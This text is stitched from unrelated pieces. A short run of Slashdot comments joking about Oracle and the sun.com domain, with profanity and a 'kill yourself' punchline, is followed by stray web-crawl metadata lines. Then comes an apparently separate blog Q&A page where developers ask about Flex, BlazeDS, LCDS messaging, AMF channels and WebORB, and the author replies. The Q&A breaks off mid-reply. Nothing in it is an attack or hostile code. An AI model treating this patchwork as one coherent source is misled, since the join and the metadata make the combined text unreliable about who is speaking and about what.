There's lot of other stuff, too.
Like @sun.com mail addresses, just for starters.
Re: (Score:2)
Like @sun.com mail addresses, just for starters.
Those were decommissioned about a year ago.
(Oddly enough, my @mysql.com address still works.)
Re:I would use it to be Frist Post! (Score:4, Informative)
Having a domain like SUN.com! Just think of the internet street cred!
Yo dog! I'm at owner@sun.com!
And what would you do with sun.com? Start some sort of internet busin&@!%&*#%OHFUCK I already have a cease and desist letter from Oracle saying they still own the trademark 'Sun' in relation to all computer everything. Your best bet it so open Sun Bakery and sell cook#@&$*!DAMNIT! Cookies are computer related too.
Ok--here's the plan: Step 1: Buy sun.com for millions Step 2: Find out you can't start a computer company named 'Sun' or Oracle will sue you into oblivion. Step 3: Kill yourself because you are millions in debt with a worthless domain name.
Re: (Score:2)
|
http://developers.slashdot.org/story/11/03/19/0122241/oracle-could-reap-1-million-for-suncom-domain
|
CC-MAIN-2015-14
|
refinedweb
| 4,079
| 74.08
|
On this page we can discuss topics, which I have not blogged. 🙂 trying to fix ASAP.
Thank you.
:)
Hi Sujith,
I am new to Flex and ActionScript world, I am basicall a java programmer, I have read to some extent about Flex and used the examples on the adobe sites. I have tried BlazeDS as well. Though I was able to run the example in the tutorial, it was rather a simple example. I am trying to map a Java Object which is complex, and Object that has more objects inside it and those objects have some objects and so on.. to a certain level, how Can I map such complex types to action script objects. Can you please provide me with a working example if ppssoible.
Your help will be greatly appreciated
-Chandu
Hi Chandu,
Lets say you have an object Student which contains properties named Address, Courses and Profile. All the three properties are different objects of respective Class types. When you are passing a object of the type Student to the Flex application, it will contain objects of the type Address, Courses and Profile right? In order to get all these objects mapped to your AS objects, all you have to do is to create AS objects of the type Address, Courses and Profile and map them to the respective Java classes individually. This applies, even if you are passing the objects in a ArrayList from Java; You will receive them as ArrayCollection, with the objects converted into mapped AS object 🙂
Hope this helps. If not let me know, i will try to give you a sample 🙂
Hi Sujith,
Thanks for your prompt reply. I will try out your suggestions. But if you can provide me a sample if you get time, that will be great too.
Thanks a Lot again.
-Chandu
Hi Sujith,
Can you please provide and example, say something like you mentioned.List of Students , I want to be able to have a page display list of students with their names courses they are taking etc, but this data should be retrieved from the Java Class,
In this scenario, where does the Action Script fit. I mean my understanding is
1) I will create a flex app i.e mxml file which will invoke the Java class like you described in one of your blog posts. But now to interpret the complex Object type returned by the java class I need Action Script objects to map to Java Objects,,…
2) I will also write the java class and put the classes in the WEB-INF folder etc
3) I will click a button to get the data from the page
In the above scenario,,,
a) where exactly will I need to create .as file mapping,
b) which folder should the .as file reside in
c) how will the client flex map know to render the data in a grid, table or text area etc
The above are some areas I am still in dark.
Your help will be greatly appreciated
Regards
-Chandu
Hello sujith,
I’m sharath, i think u remember today only i’m requesting u at the end of the elimination round in Hyderabad Boot Camp.Anyway things went wrong i didn’t had a chance to participate in the next round…Ok i have asked you the question about database but still i had a problem in connecting to it…Ok Let me ask this one I’m developing a Cricket Score analysis application using charts i succeded up to some extent…Actually my plan was to implement it in BootCamp..I completed most of the coding part but my problem is when i take the score for a team i’m using a ArrayCollection for both the teams…It sounds good for only one match score but i want to create a generic application where i want to take the match scores from the users what ever they like and store it in database.Can you please help me reagarding this one and onemore thing i’m a asp.net user.If u can provide me some code snippets it will be help ful to me.If you want i will send my application code..Please give me your Mail address. Thankyou…
Hi i created a blog for me in wordpress.In that i posted my application.I want to enhance that applicaiton using .ASPX.How to do that help
Hi Sujith,
Iam trying to use Flex with Weblogic(8.1.5) portal application. When i use HttpService to make call to the server, it returns the contents from the server, but it invalidates the existing session. Iam not able to access any other portlets.
When i use remote object call it gives me SSL handshake error.
How do i resolve this. Pls help me out
Hi Sharath,
Application looks great. You have to use some server side script to connect to the database from a Flex application. You have three options to interact with the database. You can create a .ASP page which will listen to your request and do the database operations. You can also expose the .NET functions as web services and access them from the Flex application. If you are looking for a RPC kind of solution, where in you want to invoke the functions in the .NET object from your Flex application, you can try WebORB. Below is the URL to the weborb site. You can even find code samples for all the above options i.e. web service/http service/RPC
Hope this helps.
Hi Chandu,
Your question was on how to map AS objects to Java objects. I have created a post on this, check this post on my blogs: mapping-action-script-objects-to-java-objects
Your AS class should reside in your Flex application and the mapping to the Java class is done in the AS class.
Rendering the data in a datagrid is completely a different problem. If you want to populate a datagrid with the ArrayCollection you can use the dataProvider property of the datagrid. In case of the text input or anything else, you have to retrieve the value from the object (returned by Java) and then set it to the appropriate property of the component. Please refer to the language reference of the respective components details.
Hope this helps.
Thank you for your reply sujit. I’ll try to use weborb. I want see those applications of HYDERABAD BootCamp winner can u please post them…
Hi Sujith,
Thanks for the reply, in fact i was able to overcome the AS script mapping with Java , now I am trying to dynamically create a data grid using the script and populate it with data from the java remote object, but doesnt work , I have pasted the mxml code , do u think it is right way of doing things ???
Please help.
Regards
-Chandu
////////////////////////////
<![CDATA[
import mx.events.FlexEvent;
import mx.rpc.events.ResultEvent;
import mx.binding.utils.BindingUtils;
import mx.collections.ArrayCollection;
import mx.controls.DataGrid;
import mx.controls.dataGridClasses.DataGridColumn;
import mx.containers.Panel;
import mx.controls.listClasses.ListBase;
import mx.rpc.remoting.mxml.RemoteObject;
// A data provider created by using ActionScript
//[//Bindable]
//private var employeeList:ArrayCollection ;
[Bindable]
private var ro1:RemoteObject = new RemoteObject(“prctest”);
//employeeList=ro.getEmployeeList1() as ArrayCollection;
[Bindable]
private var dg:DataGrid = new DataGrid;
[Bindable]
private var pn:Panel = new Panel;
[Bindable]
private var dgc:DataGridColumn;
private function buildDG():void
{
var aColumnDef:Array = getColumnDefArray(); //returns a noraml array of objects that specify DtaGridColumn properties
var oColumnDef:Object;
var aColumnsNew:Array = dg.columns
var iTotalDGWidth:int = 0;
for (var i:int=0;i<aColumnDef.length;i++) { //loop over the column definition array
oColumnDef = aColumnDef[i];
dgc = new DataGridColumn(); //instantiate a new DataGridColumn
dgc.dataField = oColumnDef.dataField;
dgc.headerText = oColumnDef.headerText; //start setting the properties from the column def array
dgc.width = 100;
// iTotalDGWidth += dgc.width; //add up the column widths
// dgc.editable = oColumnDef.editable;
//dgc.sortable = oColumnDef.sortable
dgc.visible = true;
//dgc.wordWrap = oColumnDef.wordWrap;
aColumnsNew.push(dgc) //push the new dataGridColumn onto the array
}
dg.id=”list”;
dg.columns = aColumnsNew; //assign the array back to the dtaGrid
dg.editable = false;
dg.width = 400;
//dp.dataProvider=;
dg.dataProvider = ro1.getEmployeeList1.lastResult; //set the dataProvider
this.pn.addChild(dg);
this.addChild(pn);
}
//uses the first product node to define the columns
private function getColumnDefArray():Array
{
//Alert.show(“colcount:” + xmlCatalog.toXMLString());
var aColumns:Array = new Array();
var oColumnDef:Object;
var empName:EmployeeName;
// for (var i:int=0;i
////////////////////////////
Hi Sujith,
How Can I create dynamic data grid and populate it with data from a jave invoked remote object. In the code I pasted above, i was able to create the grid,,, but when I provide it with the dataprovider I get error and it does not work.. can you please help me
– Regards
-Chandu
Hi Chandu,
[Small correction]
Please try changing this line
ro1.getEmployeeList1.lastResult
to
ro1.getEmployeeList1.lastResult as ArrayCollection
and also make sure the getEmployeeList1() method is invoked. 🙂
Hope this helps.
Hi Sharath,
I will post the applications developed at the Flex Boot Camp in Hyderabad as soon as possible. We have requested the KMIT college staff to burn a CD and send it to us 🙂
Hi Sujit,
I’m playing around flex and blazeds for a while now and still pretty confused at it. I found your tutorials easy to follow but i still have a question.
I can now send and receive messages through topics and using JMS-adapter. But my problem is the authentication of users, can i authenticate users through topics? can you help/guide me on login/authentication part? i don’t know what approach i will do to make this.
It seems that the returned data in this case must be processed synchoronously via a result listener. Try the following to see if it works for you,
private var ro1:RemoteObject = new RemoteObject(”prctest”);
ro1.getEmployeeList1.addEventListener(“result”, buildDG);
ro1.getEmployeeList1();
private function buildDG(event:ResultEvent):void {
//build your DG here….
dg.dataProvider = event.result;
}
Note that event.result seems exists only in the event handler, so you won’t be able to assign it to a shared variable and use it in a different function.
Hi Sujit
We need some help. We have a Java Applet that captures images on a users desktop. How can we convert the image from a byte array to string to pass to FLEX. Is there a better way to pass the images from the Applet to Flex?
Any ideas would be greatly appreciated. Also do you have time for any consulting on a project??
Great site and useful content! Could you leave some opinion about my sites?
My pages
[url=]My pages[/url] My pages
Hi Sujit,
What a lovely blog!! So useful for us.
I’m Praveena. We’ve a plan to develop one financial portal. I’m just thinking of using technologies like JBoss portal, Adobe Flex, BlazeDS.
Can you pl give a overview how can i achieve this? Or where can i get architecture using the three technologies? Can I use Eclipse IDE for development?
Pl let me.
Thank you so much.
Hi Sujith
I am able to work with BlazeDS , is it necessary the package structure for AS and Java classes match for mapping them,
for ex:
can I have a java object in package say com.abc.data.util
and the mapped actionscript class in package com.abc.client.flex.util
I have tried it and its not working, I have tried looking up the documentaion but nowhere it taks about package structure being the same
Can you please tell me if the above is true.
Regards
-Chandu
i followed the steps which u given for blazeds but am not able to make it working, its giving error “page cannot display”,
can u plz tell me how to make working the sample applications available in tomcat\webapps\samples
Hi Chandu,
The package structure of the AS class and the Java class which are mapped need NOT be same. Please check out if you are missing something else. Try checking your log files for errors 🙂
Hope this helps.
Hi Abhay,
My guesses are check if the server is running, if the server is up and running, please see if you can find any errors in the server log files. If you cannot figure out whats going wrong, please feel free to mail me with your log files.
Hope this helps.
Hi baji,
Please modified your code in setEconVarDetails() function to the below an then try.
public function setEconVarDetails(event:ResultEvent):void
{
var a_econVars:ArrayCollection = event.result as ArrayCollection;
var econVar:CardEconVar = new CardEconVar();
econVar = a_econVars.getItemAt(0) as CardEconVar;
}
Hope this helps.
Hi
my self , i am srinivas working as sr. software engineer( web,UI).
i want to learn flex designing ( CSS,Themes, layouts..etc).
any help from ur side? i am from hyderabad.
Hi Sujith
I am using BlazeDS to send data to my flex client. However is there API
or a way to find out how many bytes of data the client received from there server
if I make a remoteObject call.
Basically I am trying to find out how many bytes of data is transffred over the wire through BlazeDS……
Can you please explain the blazeDS serialization and how it works.
For eg: I am sending a list of HashMaps. Each hashMap is a set of key pair values and corresponds to 1 row of data in DataGrid. The hashMap keys are columnNames
and the values are the cell values..
Say for eg If I am sending 3 hashmaps, Since the keys are columnNames, this information is duplicated as keys in all the 3 hashMaps. I know on java side Its using the reference. But once the data is serialized through BlazeDS is that maintained or not
Any help will be greatly appreciated.
Thanks
-Chandu
Hi Chandu,
State should be maintained, please check out. I think the serialization works the same way as Java serialization.
HI SUJITH
I AM HARI..WORKING IN CDAC AS CONTRACT PROJECT ENGINEER..
I AM CURRENTLY WORKING ON JAVA/J2EE PLATFORM…I WANTED TO STUDY
FLEX + JAVA INTEGRATION PLZ HELP ME BY PROVIDING SOME GOOD TUTORIALS AND ADVICE…
HARI.S
-> About using different database urls with destinations in the hibernate assembler in LCDS.
Hi Sujith,
I have a question that I could not find any information in the web. I thought this might be familiar to you. I am having a flex app which uses data service destinations using hibernate assembler. But since all the destinations (whether runtime or xml for application scope) gets loaded on startup, I am unable to change hibernate configuration especially the database name based on the user logged in.
For example. Consider a flex app with hibernate in backend.
Company XYZ should use XYZ database
Company ABC should use ABC database.
Note: Both xyz and abc have same tables or data model.
Also changing the Original hibernate configuration (using programmatic API like Configuration()) has no effect. Also note the data service destinations once created
on server startup, cannot accept a new hibernatconfiguration as well, even if it would
it will apply the same changes for both XYZ and ABC users.
Any help on this would be appreciated. Thanks.
I am new to BlazeDS.I am using FlexBuilder3,mySQL and Java to develop a project. Initially I am getting all the records from the database through pushing mechanism. If any changes made, I am sending the whole record set again. Can you please guide me? How to use pushing mechanism with mysql database with BlazeDS….
Thanks
Hi there,
I have set up some ‘destinations’ in Blaze-DS, and am successfully using ‘Producers’/’Consumers’ from my flex application to connect to these destinations and exchange messages.
Now, since my server is hosted, any one in the world, who knows what the destination name is can connect to this blaze-ds destination of mine(from a simple flex app), and send/recieve messages. Isn’t this true? How do i prevent unauthorized access?
Looking forward to your help!
Hi Hari,
I mailed you the list of URLs.
Hope that helped
Hi Jasper,
I mailed you details on securing destinations.
Hope that helped.
Hi Sujit,
Recently I am doing a project, that needs to get read an xml file and display the content in Datagrid layout.
Could you please tell me how to do it.
If you have the answer , please forward it to my mail
Thanks
Srinu
Hi Sujit,
I’m Crystal. I’m new to Flex and BlazeDS technology. So far all the implementation is alright. But I have some questions about the Messaging Service. Hope you can answer me or provide some useful links to me or give me some examples.
Let say there are 2 different server. JMS client (producer) reside in Server A, and Flex client (consumer) reside in Server B. JMS is going to publish some data into BlazeDS destination and allow the Flex subscribe it. The questions are:
a) The main question is the BlazeDS destination should reside in which Server??
b) The BlazeDS destination can reside in Server A?? If yes, how is the Flex client going to subscribe the data in different Server?? Any idea and examples??
c) Is it a must the BlazeDS destination should reside in Server B? If so, any idea/example that enable the JMS publish the data to different Server?
Looking forward to your help. Thank you and advanced.
=Crystal=
Oh ya, i also need some details about the destination security from you. Thanks for your help again.
=Crystal=
Hi Crystal,
I Emailed details to your yahoo inbox.
Hope that helped.
Hi Srinu,
Please find code samples at the URL below.
Hope this helps 🙂
Hi Sujit,
Thanks for your information.
May I request some websites/links that related the idea u gave to me??
Thanks again.
Regards,
Crystal
Hi Sujit,
It’s me again. I really need some advise from you.
Nowadays, “performance” becoming an important issue especially when develop a real-time application.
I goes for BlazeDS Messaging also because of this.
I wonder how fast/good is the performance when millions of data push to client side.
Is it the performance is actually depends on network protocols?
E.g. BlazeDS offers long polling & streaming. Is it “Streaming” faster than “polling” ??
Where LCDS (commercial product) offers RTMP & socket-based protocol. So is it “RTMP” will faster than “Streaming” which offered by BlazeDS ??
As a conclude here, is it LCDS Messaging better than BlazeDS Messaging when want to develop a mission-critical Real-Time application??
Looking forward to your help. Thank you.
Hi i wanna create an app using flex and java but the thing is i cannot move to another page after clicking the logout button pls tell me how to do page navigation.
Hi Kesh,
Please have a look at view states in Flex. There is nothing like a page in Flex, you will have to think in terms of states or keep adding a removing components in a single state.
Please find more details on view states at the URL below.
Hope this helps.
Hi Sujit,
Can you apply the content in your blog post about Flex Message Service with BlazeDS to AIR apps? I only have access to a PHP backend and so have been trying with Weborb to no avail.
cheers
Hi Sujit,
Can you apply the content in your blog post about Flex Message Service with BlazeDS to AIR apps? I only have access to a PHP backend and so have been trying with Weborb to no avail.
cheers
Hi Sujit,
I cant able to zoom the chart in Flex for trending.
Can u please provide the examples..
Thanks in advance..
Whoops – apologies for that double entry there!
I found this post “” by Christophe which explains that you must specify the actual server address & port in the services-config.xml file rather than leaving the ‘tokens’ in place to use DS with AIR apps.
He says:
“instead of:
use: ”
I’m using BlazeDS on port 8400 and found this worked:
And similar for Weborb except on port 80.
changed this:
“weborb.php”
to this:
“”
Also of worthy note, I had to ‘clean’ my projects in Eclipse after making a change to the service-config.xml file before the change was reflected.
Now down to securing the channels…
Hi Kev,
Yes, you got it right. In case of AIR application you need to give the complete URL 🙂 and yes, you have to clean your project in Flex Builder.
Feel free to ping me if you think I can help you 🙂
Hi Sujit,
Thanks for your reply and for this great site 🙂
I notice that you sent some information to another person regarding securing AMF channels – could you please forward to me also?
I have read that the simplest way is to create a local user list to which you allow certain channels access. But I was wondering how hard it would be to query a database on the server for a list of users?
(runtime channel creation is very useful too – thanks)
cheers!
Hi Sujit,
I am new to Flex and using the Flex Dashboard sample given at
I need to use my existing Applet(which does publish/subscribe with backend), to update data in the individual pods.
Using Javascript am able to call the methods inside the Dashboard main mxml. From there am not knowing how to pass the data to the individual pods.
Can you please help me on this ASAP.
Regards.
Hi Sujit – Have a question similar to the one above.
Could you look at the below link?
Appreciate your thoughts.
Thanks
Ravi
Hi Kev,
Please find more details on how to secure channels at this URL
Hope this helps. I am sorry I was stuck with work and so the delayed response 🙂
Hello all,
I am new to BlazeDS and am working on a project that requires it. I came across your article and let me to take this opportunity to tell you that you put out a solid work. I am just wondering how can I do the following:
I have my back-end written in Java, and in my Class I have an array of Strings that keeps updated. In my client side code, I invoke the getter method for this array. I would like to display those messages at the client side as soon the server knows this array got updated.
I tried to listen and get the array data every XXXX amount of time. Unfortunately, this approach did not work. I got all the results at the very end (all at once).
Please let me know of your ideas, and if you have sample code that would be very helpful.
Thank you,
Moussa
Hey Sujit,
Thanks for the links about securing destinations – I’ve been busy on another project and finally have time to look at this again. I’ll post my results at attempting to get this working with AMFPHP/WebORB…
cheers
hello Sujit,
I am using OS X 1.5.
I install flex builder in it and working fine
now I want to display PDF file in my AIR application.
my application has main 2 part.
left side list of pdf file and right side is empty
when user click on pdf file that pdf should open in right part.
I try it with HTMLCapibility but it’s not working.
is it problem of OS X or any other thing?
Hi Sujit,
How to communicate two SWF files using Cross-Scripting method!
raaja
Hi Kpbird,
Please try visiting the URL below. If you already did that and still its not working, please send out your code to sujitreddy.g@gmail.com I will try to fix that 🙂
Hope this helps 🙂
Hi Moussa,
Remoting calls are batched. Try to send the code to sujitreddy.g@gmail.com I will try to fix it 🙂
hi sujit h r u,
iam training on adobe flex i am facing one problem ,
one remote object using lcds,iam trying to two days but iam not getting,
plese send one sample program(java class,flex code) ,and how to configure in server plese send me folder struture,
I see that you have comments about modularization in Flex and articles about using RSL in Flex, so I have a request. Point me to the ‘best practices’ for using those techniques with AIR. I have an AIR ‘container’ that has lots of Flex components that are modular AND rely on the Player to cache both the Flex framework and my own libraries. How — precisely — do you make those enhancements with AIR.
No, I don’t want to be told that desktop applications don’t need to be small and compact — nonsense — no one wants to download a 5MB update if only a .5MB update is needed. How do we do this with AIR? Your thoughts would be much appreciated since you cannot find anyone in Adobe product management willing to talk about the apparent disconnect.
Hi Adireddy,
Please visit the URL below.
Hope this helps.
I tried your example about integrating Blazeds with Flex got all the way through but the application didn’t display your message: Destination “CreatingRpc” either does no9t exist or destination has no channels defined (and the application does not define any default channel).
Got any ideas?
Hi Bob,
Couple of things you can try.
1. Clean your project in Flex Builder
2. Restart your server
3. Clean the browser cache.
4. Check if the destination exists 🙂
Hope this helps.
Hi sujith,
i am new to flex,i read ur articles and i feelthey were very much helpful.Recently I had an interview and just want to share the questions and if anybody can answer that will
be helpful.
Unit testing and how did u approach?
explain about cairngorm event?
explain interface and abstract in java with examples?
why did u use spring?
how will u check for authorization?
flex issues?
why did u use LCDS
Hi Sujith,
I have gone through your blog “Sending messages from Java to BlazeDS destinations using MessageBroker”…The flex client is working fine both as producer and consumer, but the message sent from jsp is not appearing in flex client…Do I need any other configuration? I am using BlazeDS turnkey server…
Hi Sujith,
a very good site…
i need a to retrieve java object from flex, but i don’t know how to start. Can you help me?
I’ve heard about livecycle data service, blazeDS and remote object. Are these technologies the same or they are different??
thanks a lot
Hello –
I am a designer turned developer who is moving from Flash to Flex and I have been asked to help someone plug their site into the photoshelter api (the basic documentation for this is at:). I have some limited experience in using Amfphp to make mysql queries through Flex, but am unsure whether, or how, I can access this kind of api – and can’t find any info. that clarifies things for me. Do I need to use a solution like Blaze DS and Java, or can I manage the session calls through amfphp? Can you give me any pointers on this? Thanks.
Namaste:
Would love to have an AIR app, that displays a PDF to cover the entire desktop area (until minimized).
Would love for the live PDF to become the actual desktop canvas; but I don’t know if that is possible.
Can some one speak on this.
In Service of THE ONENESS,
Rafiki “The Digital Doctor” Cai
Hey Sujit,
This is Vishnu. Good to know you are from BITS PIlani,I’m from BITS Pilani too, passed out in 2007.
So lately I’ve been trying to learn FLEX by myself. Was trying to build a twitter mashup using Chris Korhonen’s Creating Mashups with Adobe Flex and AIR. I’m not using the Flex Builder. I compiled my mxml file and transferred the generated swf file to the root of my HTTP server. I also included a crossdomain.xml file in the root since the RSS feeds it was trying to access doesn’t reside on my server.
Despite this i keep getting an error:
[Security error accessing url” faultCode=”Channel.Security.Error” faultDetail=”Destination: DefaultHTTP”]
Here is the code:
twitter.mxml
Tweet.mxml
cross-domain.xml
Where am i going wrong here?
Hi Vishnu,
Looks like the code got truncated.
You will need the crossdomain.xml on the server from which you are accessing the data from and not on the server where the SWF file is hosted.
Hope this helps.
Hi Lord,
URLs below should help you.
Hope this helps.
Hi Jai,
I don’t think you need to worry about AMFPHP for accessing the API you mentioned. Looks like they are sending their response as XML. All you need to do is to use HTTPService component and access the XML.
Please find more details on how to use HTTPService at the URL below.
Hope this helps.
Thanks Sujit, that is a useful confirmation. However I remained rather confused about security. I have to access the photoshelter api via SSL. From what I gather, that seems to mean that I must use a proxy of some sort… Is that true? If I authenticate by sending username and password over HTTPService, don’t I make my archive at photoshelter very vulnerable?
Would it still be worth it to be running the httpService through BlazeDS? Would it make any differences to speed? Again, thank you so much for your helpful advice.
After further research, I now believe that I have to set “useProxy” to true and then configure my https service via BlazeDS – or a php proxy – in order to be able to communicate via https – and send necessary username and password authentication. (There seems to be very little clear documentation on using HTTPS with BlazeDS on the web…) So although I don’t need to use secure-amf, will it perhaps give me increased speed? Even though serialising from xml, and back into xml at the other end…
Hi Sujith,
I have developed flex application with webservices..I would like to handle session time out using werbservices..i am not using remote objects…could you suggest me .?
i would like know how to configure BlazeDS with websphere 6.0.. please reply me as soon as possible..
My mail id is dinesh@visiontss.com
thanks in advance…
Hi sujit,
I have gone through the article “Sending messages from Java to BlazeDS destinations using MessageBroker”. I have implemented it and it is functioning well. Only the exception is that I am making use of LCDS instead of BlazeDS. Any way, your article provided a great help indeed.
Now all I need to send message to few(not arbitrary)consumers. Suppose there are 10 consumers and I need to send message to 7 of them. How could it be decided from server side? Could it be made possible by modifying the code of MessageSender.java? Actually I need to decided it from server side prior to send push data. Please help.
Hi Jai,
You can go ahead and use HTTPService without BlazeDS. I don’t think it will be vulnerable to pass credentials using HTTPService over HTTPS.
You will need BlazeDS if you cannot communicate with the service provider directly. That is the service provider is not having a crossdomain.xml on his server.
AMF will definitely increase performance.
URLs below might be useful. In the BlazeDS dev guide, try to read about channels and RPC services, especially proxy service.
Hope this helps.
hey Sujit,
I have a ‘design’ question for you…
I’m building an inventory application using Flex, AMFPHP, MYSQL and the Cairngorm pattern. Take 3 tables as an example: Categories, Colours, Products.
Categories:
CategoryID 1
CategoryName Pants
Colours:
ColourID 1
ColourName Red
Products:
ProductID 1
CategoryID 1
ColourID 1
ProductName Cargo Pants
Price 20.00
Now when I init the app, I send 3 events to gather all records from each table and populate 3 ArrayCollections in the ModelLocator. Great, this works fine.
But I want to populate a Datagrid which contains the fields “CategoryName”, “ColourName”, “ProductName”, “Price”.
I can think of 3 ways to do this:
1) create a new ArrayCollection in my ModelLocator and populate this by calling a PHP service which does a joined SELECT statement – disadvantages, need to refresh this AC whenever I change the contents of any of the others, duplication of data being sent/received from the server, ?
2) create a new ArrayCollection in my ModelLocator and populate by iterating through the 3 ACs in Actionscript each time any of them change – advantage, no excess data sent/received from server but potentially higher processor usage?
3) don’t create a new ArrayCollection, but use ItemRenderers for each DatagridColumn which takes the appropriate ID field and returns the Name field – again, no excess network but potential high cpu everytime the DataGrid is refreshed
Or is there another way that I cannot see!
Maybe this is a simple design concept that people learn in Software Design 101 – but having missed that class, I’m playing catchup!
Cheers!
Hi Sujith,
I’m relatively new to flex, we are developing a multiplayer online game using flex client and blazeds.I want to know how scalable is the blazeds server and what are the measures i need to take two improve the scalabity of the blazeds server which i have configured into tomcat.
Looking forward to hearing from at the earliest
Thaks and regards
Kalyan
Hi Kalyan,
Please check out the capacity planning guide at the URL below.
Hope this helps.
Hi Kev,
I would go with the first approach and paginate my data. If the data is huge, then the processing required to loop through the collections for each item is HUGE 🙂
Hope this helps.
Hi Souvik,
Please try creating custom messaging adapter and filter your message there by setting selectors. Please find more details at the URLs below.
Hope this helps.
Hi Diny.
Its similar to deploying it on any server. You have to
1. Change web.xml
2. copy BlazeDS jar files into WEB-INF/lib folder
3. Place your configuration files (services-config.xml) in WEB-INF/flex folder
Hope this helps 🙂
Hi Sujith,
Thanks for the swift response.But my concern was to improve the scalability of open source blazeds but you were referring to LCDS which my org cannot afford.kindly suggest me keeping in view open source blazeds which is our priorityand about its scalability.looking forward to hearing from you
Hi Kalyan,
It all depends on the channel you are using. The capacity planning guide which I pointed to you previously has comparison for all channels. BlazeDS supports only Servlet based channels like AMFChannel, HTTPChannel, HTTPStreamingChannel and AMFStreamingChannel. Where as LCDS has these Servlet based channels as well as Java NIO based channels (which scale a lot) and RTMP channel. The code for both LCDS and BlazeDS is same for the channels supported in both the products.
In the capacity planning guide, you can look at a section where they are comparing Servlet based channel with NIO based channels. Basically, Servlet based channels can handle only few hundreds of clients at one go as there are restrictions on number of threads a web server will run and each connection to a client will occupy one thread in the case of Servlet based channels.
Hope this helps.
hi Sujit,
I have the following java nd as classses
Java class —
public class PatientVO
{
private AverageDays[] myAvrgDays;
public AverageDaysPerPipelineVO[] getAvrgDays() {
return myAvrgDays;
}
public void setAvrgDaysPerPiplnVos(
AverageDays[] avrgDays) {
this.myAvrgDays = (AverageDays[])avrgDays;
}
}
AS class —
[Bindable]
[RemoteClass(alias=”vo.PatientVO “)]
public class PatientVO implements IValueObject
{
public var avrgDays : Array;
}
}
Here it actually converts the java object to flex as object with no problems.
But when i am passing the as object to java, it somehow nullifies the array (myAvrgDays) in the java object.
This problem happens only when when i am using arrays.
and works fine with array list
hi sujit,
one more query,
I have a line graph with DateTimeAxis.
By default if my dateUnits is in year and all the data points to be plotted fall into same year, the date time axis won’t show up the year.
if the data points spread out to more than one year, then date time axis shows all the years.
Is there a way to show the year on the date time axis, if there is only one year and all data points fall into this year only?
hi sujit,
i digged out the solution for myself. Set the property alignLabelsUnits=false, so that graph puts a label always at the beginning of axis
Thanks
hi sujit,
the issue with action script array to java array was my local problem, happnd bcz of my mistake in the code.
Thanks
Bibin
hi,
i am trying to integrate LCDS 2.5 with JBoss 4.0.1 SP1. i followed the instructions given.When it tried to deploy the samples.war provided with LCDS, the server throws”ERROR [Engine] StandardContext[/samples]StandardWrapper.Throwable
java.lang.NoSuchMethodError: flex.messaging.config.LoginCommandSettings.setServer(Ljava/lang/String;)V “.
also,”ERROR [Engine] StandardContext[/samples]Servlet /samples threw load() exception
javax.servlet.ServletException: Servlet.init() for servlet MessageBrokerServlet threw exception”. i dont have a clue. can you please help me out..?
cheers,
ravish
Hi Ravish,
Please visit this URL for installation instructions on JBoss server.
Hope this helps.
Hi,
Problem in getting cookie object in JSP
I want to get the cookie object in main.html(wrapper) that I have made JSP page,
when it is loded and want to set value of cookie to flashvars so I can get it
in preinitialize of application, But problem in getting the cookie object in JSP????
Description : I have set the cookie on combo change for language using,
HttpServletRequest request = FlexContext.getHttpRequest();
HttpServletResponse response = FlexContext.getHttpResponse();
But didnt get this cookie value in JSP,request = FlexContext.getHttpRequest() is null in JSP
can u help me in solving this problem??
Hi Sujit,
I am Java developer and new to Flex envionrment.I have implemented some examples on Flex from Adobe website.I am tried to install LCDS on Weblogic 8.1 server but was unsuccesful in doing so.I tried the installion by following the procedure in /8.2/lcds_installation.html.If you can provide detail procedure regarding the installation it would be helpful.
Thanks,
Srinivas
Thanks for your reply Sujith.
I need your helping hand again.
i am trying to define a StreamingAMFChannel in LCDS ES 2.5.1, it is not getting defined, and it shows channel is undefined. the same configuration is working just fine with BlazeDS. Just wondering is this version LCDS ES 2.5.1 supports StreamingAMFChannel…?
cheers,
ravish
Hi Srinivas,
Can you please explain what exactly is happening. Is the installation not being completed or you could not start the server?
Hi Ravish,
I think it was added to LCDS 2.6
Hope this helps. 🙂
Hi Ragini,
I think FlexContext.getHttpRequest() is null in a JSP page because the MessageBrokerServlet is the one which sets the HTTPRequest object to the FlexContext
As the request is not going thru MessageBrokerServlet I don’t think you will have the HTTPRequest object. Please try the normal J2EE way to get access to the cookie in your JSP page.
Hope this helps.
Hi Sujith…
Could you let me know about configuring BlazeDS with BEA weblogic workshop ? I would like to know the changes to be made in configuration.xml file with a small example.
Tanmoy
hi sujit,
i am working on a project using weborb for .net and flex 3.
i am retrieving an Array of strings from asp.net using weborb. the array has the right length; but all the values are blank. in weborb i have used the test-run feature to invoke this same call; and the array is returned with all the values. i have done the same from an aspx page. maybe it’s the way i am reading the array into actionscript? please help me (and other weborb for.net+flex users) with a tutorial on interaction between these two(and a solution for my problem too 🙂 ) thank you in advance. daniel
ps: if it makes a difference; the class is written in c#; and the class retrieves a static array and returns an array.(returned_array = static_array).
Please let me ask you a question.In our application, we are using a custom messaging adapter which uses a rtmp channel. Our intension is to get an acknowledgement in the server. In our case, let us assume a java class is the message producer(like MessageSender.java in your article “Sending messages from Java to BlazeDS destinations using MessageBroker”). If we would have sent message using Flex Producer component, we can optionally specify “acknowledge” and “fault” event handlers for a Producer component. How exactly this could be implemented when a java class is sending the message and this class is acting as a message Producer.
Hi Sujit,
I am working on blazeds applications where i
want to detect browser close event of on server side.
I have tried using adaptors and session listeners,
but nothing going right for me.
i saw your blog and thought that you are the right person to
solve the problem.
So please let me know if there is any solution for
the same.
Regards,
Pravin Uttarwar,
Hi Sujith,
We are trying to integrate Flex with a Single-sign on product (Siteminder). In our environment, the incoming request to the Flex application will get routed via Siteminder. Siteminder will authenticate the incoming request, then append few authorization details (user profile, like role, department, etc) in the Http header and redirect the request to the Flex application.
Our requirement is to read the http header information, and take some business validation based on user profile. But we couldn’t able to find any direct functions, which helps us to read the http header information. When we browsed through Flex documentation, we found couple of functions for it (like URLLoader). But these functions require sending explict request to the server and reading the response header. But in our case, we are not sending any explicit request to Siteminder. Rather we are just trying to read the http header, when the user request hits the swf file.
We have managed found a solution using JSP wrapper and Flashvar. But we don’t want to use a JSP wrapper in-between. Is there any other alternate way to read http header? Any suggestion would be greatly appreciated.
Thanks,
Kumar
Hi Sujith,
Need barcode handling like generating label, reading barcode etc.,
thanks and regards
raaja
Hi Raja,
I didn’t understand 😦
Hi Pravin,
Flex application running in Flash Player in browser will not dispatch any event when the browser is closing. You will have to use ExternalInterface for this. Pleaes find more details on how to achieve this at the URL below.
Hope this helps.
Hi Souvik,
Do you want an acknowledgment on the server ? So, you want to make sure the message is being delivered. Did i understand it correctly ?
Hi Daniel,
